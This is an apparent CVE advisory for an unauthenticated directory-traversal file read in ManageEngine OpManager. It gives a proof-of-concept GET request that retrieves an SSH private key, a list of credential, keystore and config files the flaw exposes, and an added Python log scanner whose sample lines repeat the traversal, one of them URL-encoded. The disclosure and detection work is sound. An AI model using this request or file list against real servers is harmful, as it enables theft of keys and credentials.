CVE-2020-12116
Description
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
Technical Analysis
Unauthenticated arbitrary file read on ManageEngine OpManager
DESCRIPTION
The latest release of OpManager contains a directory traversal vulnerability that allows unrestricted, unauthenticated read access to every file in the OpManager application directory. This includes private SSH keys, password-protected Java keystores, and configuration files containing the passwords to those keystores, private certificates, and the backend database. If LDAP is configured, domain credentials can be obtained from "conf/OpManager/ldap.conf".
PROOF OF CONCEPT
REQUEST:
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:
HTTP/1.1 200
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----
Files confirmed readable through this traversal (paths relative to the OpManager application directory):
- bin/.ssh_host_dsa_key
- bin/.ssh_host_dsa_key.pub
- bin/.ssh_host_rsa_key
- bin/.ssh_host_rsa_key.pub
- conf/client.keystore
- conf/customer-config.xml
- conf/database_params.conf
- conf/FirewallAnalyzer/aaa_auth-conf.xml
- conf/FirewallAnalyzer/auth-conf_ppm.xml
- conf/gateway.conf
- conf/itom.truststore
- conf/netflow/auth-conf.xml
- conf/netflow/server.xml
- conf/netflow/ssl_server.xml
- conf/NFAEE/cs_server.xml
- conf/OpManager/database_params.conf
- conf/OpManager/database_params_DE.conf
- conf/OpManager/ldap.conf
- conf/OpManager/MicrosoftSQL/database_params.conf
- conf/OpManager/POSTGRESQL/database_params.conf
- conf/OpManager/POSTGRESQL/database_params_DE.conf
- conf/OpManager/securitydbData.xml
- conf/OpManager/SnmpDefaultProperties.xml
- conf/Oputils/snmp/Community.xml
- conf/Persistence/DBconfig.xml
- conf/Persistence/persistence-configurations.xml
- conf/pmp/PMP_API.conf
- conf/pmp/pmp_server_cert.p12
- conf/product-config.xml
- conf/SANSeed.xml
- conf/server.keystore
- conf/server.xml
- conf/system_properties.conf
- conf/tomcat-users.xml
- lib/OPM_APNS_Cert.p12
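A defender-side log check, added here as an example and not part of the original assessment: it scans constructed access-log lines for cachestart/cacheend requests whose path, once URL-decoded and normalised, resolves outside the apiclient static directory. The log format, the sample lines and the assumption that legitimate cache requests stay under /apiclient are mine, not the page's.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the original assessment): the first
# mirrors the PoC request above, the second is a benign static-file request,
# the third is a URL-encoded variant of the same traversal.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Apr/2020:15:40:01 +0000] "GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1" 200 902
10.0.0.6 - - [13/Apr/2020:15:41:12 +0000] "GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/jquery.min.js HTTP/1.1" 200 86927
10.0.0.7 - - [13/Apr/2020:15:42:30 +0000] "GET /cachestart/125116/cacheend/apiclient/%2e%2e/%2e%2e/conf/OpManager/ldap.conf HTTP/1.1" 200 1337
"""

# Assumption: legitimate cachestart/cacheend requests only serve files under
# the apiclient static directory; anything resolving outside it is suspect.
ALLOWED_ROOT = "/apiclient"
CACHE_PREFIX = re.compile(r"^/cachestart/\d+/cacheend(?P<rest>/.*)$")
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def classify_request(path):
    """Return (escaped, resolved_path). escaped is True when the decoded,
    normalised path leaves ALLOWED_ROOT; resolved_path is None for paths
    that are not cachestart/cacheend requests at all."""
    m = CACHE_PREFIX.match(path.split("?", 1)[0])
    if not m:
        return False, None
    # Decode twice so %252e%252e (double-encoded) is handled as well as %2e%2e.
    rest = unquote(unquote(m.group("rest")))
    resolved = posixpath.normpath(rest)
    inside = resolved == ALLOWED_ROOT or resolved.startswith(ALLOWED_ROOT + "/")
    return (not inside), resolved


def scan_log(text):
    """Return (raw_path, resolved_path) for every log line flagged as traversal."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        escaped, resolved = classify_request(m.group("path"))
        if escaped:
            hits.append((m.group("path"), resolved))
    return hits


if __name__ == "__main__":
    for raw, resolved in scan_log(SAMPLE_LOG):
        print(f"TRAVERSAL {raw} -> {resolved}")
```

Matching on the normalised target rather than on a literal `../` substring is what catches the encoded variant; a hit whose resolved path lands in bin/, conf/ or lib/ is an attempt at one of the files listed above.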
General Information
Vendors
- zohocorp
Products
- manageengine opmanager
- manageengine opmanager 12.4
- manageengine opmanager 12.5